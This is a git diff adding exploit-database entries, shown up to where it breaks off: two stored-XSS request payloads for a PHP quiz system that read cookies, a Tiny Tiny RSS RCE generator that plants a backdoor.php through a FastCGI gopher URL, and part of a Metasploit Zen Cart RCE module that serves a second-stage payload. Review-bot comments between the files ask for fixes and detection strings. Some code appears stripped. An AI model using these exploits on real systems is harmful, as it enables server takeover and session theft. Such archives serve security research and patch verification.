diff --git a/exploits/php/webapps/49605.txt b/exploits/php/webapps/49605.txt
new file mode 100644
index 000000000..e8e450999
--- /dev/null
+++ b/exploits/php/webapps/49605.txt
@@ -0,0 +1,42 @@
+# Exploit Title: Web Based Quiz System 1.0 - 'MCQ options' Persistent/Stored Cross-Site Scripting
+# Date: 2021-03-02
+# Exploit Author: Praharsh Kumar Singh
+# Vendor Homepage: https://www.sourcecodester.com
+# Software Download Link: https://www.sourcecodester.com/php/14727/web-based-quiz-system-phpmysqli-full-source-code.html
+# Software: Web Based Quiz System
+# Version: 1.0
+# Vulnerability Type: Cross-site Scripting
+# Vulnerability: Persistent/Stored XSS
+# Tested on: Parrot OS
+
+# Stored/persistent XSS has been discovered in the Web Based Quiz System created by sourcecodester/janobe
+# in adding questions in options parameter affected from this vulnerability.
+# payload:
+
+POST /onlinequiz_0/update.php?q=addqns&n=1&eid=603d2f766b0d0&ch=4 HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 101
+Origin: http://localhost
+DNT: 1
+Connection: close
+Referer: http://localhost/onlinequiz_0/dashboard.php?q=4&step=2&eid=603d2f766b0d0&n=1
+Cookie: PHPSESSID=icctgctoho6nlqc6cbp8bftkeh
+Upgrade-Insecure-Requests: 1
+Sec-GPC: 1
+
+qns1=1&11=1&12=1&13=%3C%2Fscript%3E%3Cscript+%3Ealert%28document.cookie%29%3C%2Fscript%3E&14=1&ans1=c
+
+POC:
+# go to url http://localhost:8080/admin.php
+# login and add question
+# then put the above payload in MCQ options parameter
+# then fill the remaining details
+# then click add
+# go to url http://localhost:8080/login.php
+# then login to user account
+# then attempt the quiz while attempting the quiz xss pop up there..!
\ No newline at end of file
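Review bot: The write-up stops at reproduction and never names the fix, so a maintainer learns that the MCQ option text posted to `update.php?q=addqns` is stored and later shown to quiz takers, but not what to change. I would add a closing line such as `# Fix: HTML-encode stored option text where the quiz page renders it, e.g. htmlspecialchars($opt, ENT_QUOTES, 'UTF-8'), and validate it on input` (the variable name is illustrative). The steps are also inconsistent with the captured request: the request targets `Host: localhost` under `/onlinequiz_0/`, while the POC lines point at `http://localhost:8080/admin.php` and `/login.php`. The same missing-remediation point applies to 49607.txt, where the stored `name` value is rendered in the ranking section.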
diff --git a/exploits/php/webapps/49606.py b/exploits/php/webapps/49606.py
new file mode 100755
index 000000000..808031cf2
--- /dev/null
+++ b/exploits/php/webapps/49606.py
@@ -0,0 +1,83 @@
+# Exploit Title: Tiny Tiny RSS - Remote Code Execution
+# Date: 21/09/2020
+# Exploit Author: Daniel Neagaru & Benjamin Nadarević
+# Blog post: https://www.digeex.de/blog/tinytinyrss/
+# Software Link: https://git.tt-rss.org/fox/tt-rss
+# Version: all before 2020-09-16
+# Commit with the fixes: https://git.tt-rss.org/fox/tt-rss/commit/c3d14e1fa54c7dade7b1b7955575e2991396d7ef
+# Tested on: default docker installation method
+# CVE : CVE-2020-25787
+
+#!/usr/bin/env python3
+
+from sys import argv
+import urllib.parse as ul
+import base64
+
+
+def CustomFcgi( filename, output, backdoor):
+ length=len(output)+len(backdoor)+64
+ char=chr(length)
+
+ data = "\x0f\x10SERVER_SOFTWAREgo / fcgiclient \x0b\tREMOTE_ADDR127.0.0.1\x0f\x08SERVER_PROTOCOLHTTP/1.1\x0e" + chr(len(str(length)))
+ data += "CONTENT_LENGTH" + str(length) + "\x0e\x04REQUEST_METHODPOST\tKPHP_VALUEallow_url_include = On\n"
+ data += "disable_functions = \nauto_prepend_file = php://input\x0f" + chr(len(filename)) +"SCRIPT_FILENAME" + filename + "\r\x01DOCUMENT_ROOT/"
+
+ temp1 = chr(len(data) // 256)
+ temp2 = chr(len(data) % 256)
+ temp3 = chr(len(data) % 8)
+
+ end = str("\x00"*(len(data)%8)) + "\x01\x04\x00\x01\x00\x00\x00\x00\x01\x05\x00\x01\x00" + char + "\x04\x00"
+ end += "\x00\x00\x00\x00"
+ start = "\x01\x01\x00\x01\x00\x08\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x01\x04\x00\x01" + temp1 + temp2 + temp3 + "\x00"
+
+ payload = start + data + end
+ def get_payload(payload):
+ finalpayload = ul.quote_plus(payload, encoding="latin-1").replace("+","%20").replace("%2F","/")
+ return finalpayload
+
+ return "gopher://localhost:9000/_"+get_payload(get_payload(payload))
+
+
+
+TTRSS_PATH = "/var/www/html/tt-rss/"
+BACKDOOR_CODE = """
+
+"""
+
+
+feed_file = open("malicious_RCE_feed.xml",'w')
+filename = TTRSS_PATH + "config.php"
+output = TTRSS_PATH + "backdoor.php"
+
+backdoor_code = base64.b64encode(BACKDOOR_CODE.encode("ascii"))
+rce = "public.php?op=pluginhandler&plugin=af_proxy_http&pmethod=imgproxy&url=" + CustomFcgi(filename, output, backdoor_code) + "&text"
+
+feed ="""
+
+
+
+ Exploit demo - rce
+
+ You are getting infected :(
+ -
+ Check if there is backdoor.php
+
+
+
+
+ ]]>
+
+
+
+
+""".format(rce)
+
+feed_file.write(feed)
+feed_file.close()
\ No newline at end of file
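Review bot: `CustomFcgi` has no docstring and the header never says what the generated file does on the server, which makes the sample hard to use for detection or for verifying the patch. A docstring should state that it builds a FastCGI request setting `allow_url_include = On` and `auto_prepend_file = php://input`, wraps it in a double URL-encoded `gopher://localhost:9000/_` URL, and that this URL is passed as the `url` parameter of `public.php?op=pluginhandler&plugin=af_proxy_http&pmethod=imgproxy`. Those strings are what to look for in web-server logs, and the fix commit linked in the header is the remediation. Two style points: `#!/usr/bin/env python3` sits below the comment header, so it has no effect on a file committed with mode 100755, and `feed_file` is opened at module level without a `with` block, so it is not closed if `CustomFcgi` raises.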
diff --git a/exploits/php/webapps/49607.txt b/exploits/php/webapps/49607.txt
new file mode 100644
index 000000000..cdca60fa2
--- /dev/null
+++ b/exploits/php/webapps/49607.txt
@@ -0,0 +1,60 @@
+# Exploit Title: Web Based Quiz System 1.0 - 'name' Persistent/Stored Cross-Site Scripting
+# Date: 2021-03-02
+# Exploit Author: P.Naveen Kumar
+# Vendor Homepage: https://www.sourcecodester.com
+# Software Download Link : https://www.sourcecodester.com/php/14727/web-based-quiz-system-phpmysqli-full-source-code.html
+# Software : Web Based Quiz System
+# Version : 1.0
+# Vulnerability Type : Cross-site Scripting
+# Vulnerability : Persistent/Stored XSS
+# Tested on: Windows 10 Pro
+
+# Stored/persistent XSS has been discovered in the Web Based Quiz System created by sourcecodester/janobe
+# in registration form in name parameter affected from this vulnerability.
+# payload:
+
+# HTTP POST request
+POST http://localhost:8080/quiz/register.php HTTP/1.1
+Host: localhost:8080
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data; boundary=---------------------------283640616528311462411171270636
+Content-Length: 690
+Origin: http://localhost:8080
+Connection: keep-alive
+Referer: http://localhost:8080/quiz/register.php
+Cookie: PHPSESSID=ptujqhbkupjsqjkqs7tjhnb5er
+Upgrade-Insecure-Requests: 1
+
+-----------------------------283640616528311462411171270636
+Content-Disposition: form-data; name="name"
+
+
+-----------------------------283640616528311462411171270636
+Content-Disposition: form-data; name="email"
+
+test123@gmail.com
+-----------------------------283640616528311462411171270636
+Content-Disposition: form-data; name="password"
+
+Hacker
+-----------------------------283640616528311462411171270636
+Content-Disposition: form-data; name="college"
+
+hello
+-----------------------------283640616528311462411171270636
+Content-Disposition: form-data; name="submit"
+
+
+-----------------------------283640616528311462411171270636--
+
+POC:
+# go to url http://localhost:8080/quiz/register.php
+# then you have to fill the above payload in name/username parameter
+# then fill the remaining details
+# then click submit
+# then login to user account
+# then attempt any one quiz after attempting go to ranking section then
+# you can see xss pop up there..!
\ No newline at end of file
diff --git a/exploits/php/webapps/49608.rb b/exploits/php/webapps/49608.rb
new file mode 100755
index 000000000..1afa95e0e
--- /dev/null
+++ b/exploits/php/webapps/49608.rb
@@ -0,0 +1,213 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+###
+#
+#
+# This exploit write payload in database and trig to command
+# a bug in an zencart v1.5.7b web application
+#
+###
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = NormalRanking
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::Remote::HttpServer
+
+ def initialize(info = {})
+ super(
+ update_info(
+ info,
+ 'Name' => 'zencart authenticated remote code execution exploit',
+ 'Description' => %q(
+ This exploit module execution os command in zencart.
+ ),
+ 'License' => MSF_LICENSE,
+ 'Author' => ['Mucahit Saratar '], # msf module & research & poc
+ 'References' =>[
+ [ 'OSVDB', '' ],
+ [ 'EDB', '' ],
+ [ 'URL', 'https://github.com/MucahitSaratar/zencart_auth_rce_poc'],
+ [ 'CVE', '2021-3291']
+ ],
+ 'Platform' => 'php',
+ 'Privileged' => false,
+ 'Arch' => ARCH_PHP,
+ 'Targets' => [ ['Automatic', { }] ],
+ 'DisclosureDate' => '2021-01-22',
+ 'DefaultTarget' => 0
+ )
+ )
+ register_options(
+ [
+ Opt::RPORT(80),
+ OptString.new('USERNAME', [ true, 'User to login with', 'admin']),
+ OptString.new('PASSWORD', [ true, 'Password to login with', '']),
+ OptString.new('BASEPATH', [ true, 'zencart base path eg. /zencart/', '/']),
+ OptString.new('MODULE', [ true, 'Module name. eg. payment,shipping,ordertotal,plugin_manager', 'payment']),
+ OptString.new('SETTING', [ true, 'setting name. eg. freecharger for payment', 'freecharger']),
+ OptString.new('TARGETURI', [ true, 'Admin Panel Path', '/cracK-Fqu-trasH/'])
+ ], self.class
+ )
+ end
+
+ def start_server
+ ssltut = false
+ if datastore["SSL"]
+ ssltut = true
+ datastore["SSL"] = false
+ end
+ start_service({'Uri' => {
+ 'Proc' => Proc.new { |cli, req|
+ on_request_uri(cli, req)
+ },
+ 'Path' => resource_uri
+ }})
+ print_status("payload is on #{get_uri}")
+ @adresim = get_uri
+ datastore['SSL'] = true if ssltut
+ end
+
+ def on_request_uri(cli, request)
+ print_good('First stage is executed ! Sending 2nd stage of the payload')
+ send_response(cli, payload.encoded, {'Content-Type'=>'text/html'})
+ end
+
+ def tabanyol
+ datastore["BASEPATH"]
+ end
+
+ def isim
+ datastore["USERNAME"]
+ end
+
+ def parola
+ datastore["PASSWORD"]
+ end
+
+
+ def login
+ #"index.php?cmd=login&camefrom=index.php"
+ res = send_request_cgi(
+ 'method' => 'GET',
+ 'uri' => normalize_uri(tabanyol, target_uri.path, "index.php"),
+ 'vars_get' => {
+ 'cmd' => 'login',
+ 'camefrom' => 'index.php'
+ })
+ #
+ unless res
+ fail_with(Failure::Unreachable, "Access web application failure")
+ end
+ if res.code != 200
+ fail_with(Failure::Unreachable, "we not have 200 response")
+ end
+
+ if !res.get_cookies.empty?
+ @cookie = res.get_cookies
+ @csrftoken = res.body.scan(//).flatten[0] || ''
+ if @csrftoken.empty?
+ fail_with(Failure::Unknown, 'There is no CSRF token at HTTP response.')
+ end
+ vprint_good("login Csrf token: "+@csrftoken)
+ end
+
+ res = send_request_cgi(
+ 'method' => 'POST',
+ 'uri' => normalize_uri(tabanyol, target_uri.path, "index.php?cmd=login&camefrom=index.php"),
+ 'cookie' => @cookie,
+ 'vars_post' => {
+ 'securityToken' => @csrftoken,
+ 'action' => "do"+@csrftoken,
+ 'admin_name' => isim,
+ 'admin_pass' => parola
+ })
+ if res.code != 302
+ fail_with(Failure::UnexpectedReply, 'There is no CSRF token at HTTP response.')
+ end
+ true
+ end
+
+
+ def check
+ unless login
+ fail_with(Failure::UnexpectedReply, 'Wrong credentials')
+ return CheckCode::NotVulnerable('Wrong credentials')
+ end
+ print_good("We loged in")
+ Exploit::CheckCode::Vulnerable
+ CheckCode::Vulnerable('Authenticated successfully')
+
+ end
+
+ def exploit
+ check
+ start_server
+ sleep(4)
+ res = send_request_cgi(
+ 'method' => 'GET',
+ 'uri' => normalize_uri(tabanyol, target_uri.path, "index.php"),
+ 'vars_get' => {
+ 'cmd' => 'modules',
+ 'set' => datastore["MODULE"],
+ 'module' => datastore["SETTING"],
+ 'action' => 'edit'
+ },
+ 'cookie' => @cookie
+ )
+ if res.code != 200
+ fail_with(Failure::UnexpectedReply, 'Something Wron. code must be 200')
+ end
+ #
+ if res && res.code == 200
+ @formtoken = res.body.scan(//).flatten[0] || ''
+ if @formtoken.empty?
+ fail_with(Failure::UnexpectedReply, 'securitytoken not in response')
+ end
+ #print_good(@formtoken)
+ #